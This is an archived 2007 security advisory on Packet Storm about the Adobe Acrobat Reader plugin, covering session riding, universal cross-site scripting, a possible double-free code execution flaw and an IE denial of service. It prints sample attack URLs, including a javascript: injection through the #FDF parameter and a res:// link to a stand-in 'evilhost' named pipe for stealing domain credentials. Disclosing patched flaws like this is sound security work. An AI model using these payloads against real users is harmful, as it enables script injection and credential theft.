exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

adobeplugin.txt

adobeplugin.txt
Posted Jan 4, 2007
Authored by Stefano Di Paola | Site wisec.it

The Adobe Acrobat Reader plugin is susceptible to session riding and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | 6f8787159ec262edcfdaedc27ea3b2c37a154fdd74c3dce34a6fc9e8817c536d

adobeplugin.txt

Change Mirror Download
Adobe Acrobat Reader Plugin - Multiple Vulnerabilities

Original Advisory:
http://www.wisec.it/vulns.php?page=9

Original Discovery and Research:
Stefano Di Paola

Contribution:
Giorgio Fedon (IE Dos, UXSS Analysis)
Elia Florio (Poc and Code Execution analysis)

Status: Vendor Informed on 15 October 2006
Patched: Yes

Please upgrade your current version of adobe acrobat

_______________________________________________________

Brief Intro:

During our lecture at 23C3 (Subverting Ajax), we presented
some interesting attack vectors to take advantage of
the dangerous vulnerability called "Prototype Hijacking"
in browser frameworks. Any XSS represents a good
entry point, and single Universal XSS is de facto the best
entry point.

Since Adobe did a great job and patched in less than 1
month the issues herein reported, we decided to
undisclose our findings during 23C3 to make the audience
better understand risks and impacts of high-level plugins
vulnerabilities (e.g. Func. Integration and not memory
corruption).

There is also a possible remote code execution (RCE), but
was not the focus of our talk.
Affected Versions:
Adobe Acrobat Reader plugin 7 (fully patched) and Below

Tested On:
Firefox 1.5.0.7 and Below, 2.0RC2 under Windows XP SP2
Firefox 1.5.0.7 and Below, 2.0RC2 under Ubuntu 6.06
Internet Explorer SP2 under Windows XP SP2

Summary:

Adobe Acrobat plugin for Mozilla Firefox (acroreader) is able to
populate Portable Documents
(PDF files) forms by supplying an external set of datas through the FDF,
XML, or XFDF fields.
Implementation of FDF, XML, XFDF
(http://partners.adobe.com/public/developer/en/acrobat/PDFOpenParameters.pdf)
functionalities in Acrobat Reader Plugin is vulnerable to different kind
of attacks.
Vulnerability extent changes from browser to browser:

1. Universal CSRF / session riding;
(Mozilla Firefox, Internet Explorer, Opera + Acrobat Reader plugin)

2. UXSS in #FDF, #XML e #XFDF;
(Mozilla Firefox + Acrobat Reader plugin)

3. Possible Remote Code Execution;
(Mozilla Firefox + Acrobat Reader plugin)

4. Denial of Service;
(Internet Explorer + Acrobat Reader plugin)

______________________________________


1. Universal CSRF and session riding


This is probably Adobe related as all tested browsers (IE,Firefox,Opera)
where affected.
The issue is that by creating a special link like this:

http://site.com/file.pdf#FDF=http://victim.com/index.html?param=...

automatically Adobe plugin sends a request to 'victim.com' without user
interaction asking
for defined page in 'fdf' parameter. This could be used as a Universal
Session Riding (aka UCSRF)
attack which is a well known vulnerability.
Note that the same effect is accomplished by using 'xml' and 'xfdf'
parameters.


=====

2. UXSS in #FDF, #XML e #XFDF

In addition by using the following request, is possible to execute
javascript code
inside Firefox browser:

http://site.com/file.pdf#FDF=javascript:alert('Test Alert')

The previous could be triggered against a site and because of this is a
Universal Cross Site
Scripting.
UXSS is a particular type of Cross Site Scripting and has the ability to
be triggered
by exploiting flaws inside browsers, instead of leveraging the
vulnerabilities against
insecure web sites. It's also possible to force clients to download
files by supplying:

http://site.com/file.pdf#FDF=javascript:document.location=
'file://C:/winnt/notepad.exe'

<Alternative_Attack>

Alternative Attack using NamedPipes
- http://www.514.es/2006/10/exploiting_win32_design_flaws.html

In order to steal Domain credentials with explorer :

http://anyhost/file.pdf#fdf=res://\\evilhost\pipe\apipe

and then by applying techniques found in 514.es paper we found
this kind of url and protocol (res://) could be used too.

This means that also Internet Explorer could be abused in conjunction
of
Adobe plugin to make attacks on internal LANs and get victims
credentials.

</Alternative_Attack>


3. Possible Remote Code Execution
There is also a possible Remote code Execution by leveraging a memory
corruption inside
Firefox by supplying the following request:

http://site.com/file.pdf#FDF=javascript:document.write('jjjjj...');

It's possible to cause a DoubleFree() error and to overwrite part of the
Structural
Exception Handler.

Runtime vulnerability analisys
The problem seems to be caused by a "Double MSVCRT.free()" executed by
Acrobat plugin.
The routine which cause Firefox to crash is located in the following
call to NP_Shutdown().

Elia Florio is credited for Runtime analysis and exploitation.

NB. The POC of this vulnerability won't be released.

=====

4. Denial of Service (Internet Explorer only);

By supplying the following request via the web browser,
it's possible to cause a denial of service in Internet Explorer:

http://site.com/file.pdf#####...(More '#')

The application is waiting for more inputs and allocates more memory.




--
...oOOo...oOOo....
Stefano Di Paola
Software & Security Engineer

Web: www.wisec.it
..................

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close